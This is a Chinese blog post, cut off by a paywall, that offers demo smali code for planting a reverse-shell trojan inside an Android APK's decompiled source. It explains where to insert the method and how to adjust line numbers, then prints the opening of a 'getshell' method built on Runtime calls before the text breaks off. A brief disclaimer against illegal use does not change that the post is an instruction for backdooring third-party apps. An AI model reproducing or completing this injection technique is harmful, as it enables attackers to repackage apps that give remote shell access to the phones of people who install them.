这篇博客提供了一个在安卓APK的SMALI源码中植入反弹SHELL木马的DEMO,详细解释了如何将恶意代码插入到函数中,并展示了调用该函数的代码。作者提醒读者此技术仅用于测试,不得用于非法目的。需要注意的是,实际应用中需要根据目标应用的包名和类名进行适当修改,并且设备上需要安装相应工具才能运行。
向安卓APK smali源码中植入木马反弹SHELL的测试代码【请勿用于非法目的,切记!】
在安卓应用程序中植入木马已经不是什么新鲜事情,下面给出一个demo 反弹shell的一个smali源码,可以直接插入到目标应用的smali源码中,其中第一部分为函数体。注意修改其中的.line 行号。建议插入到一个smali文件的末尾,这样行号只要顺着原smali文件的行号增大即可。
然后使用第二部分的源码进行调用。
# virtual methods
.method public getshell()V
.registers 8
.prologue
.line 28
invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
move-result-object v1
.line 31
.local v1, rt:Ljava/lang/Runtime;
:try_start_4
sget-object v2, Ljava/lang/System;->out:Ljava/io/PrintStream;
const-string v3, “NC IS OK!!!!”
invoke-virtual {v2, v3}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V
.line 34
sget-object v2, Ljava/lang/System;->out:Ljava/io/PrintStream;
invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
move-result-object v3
const/4 v4, 0×3
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
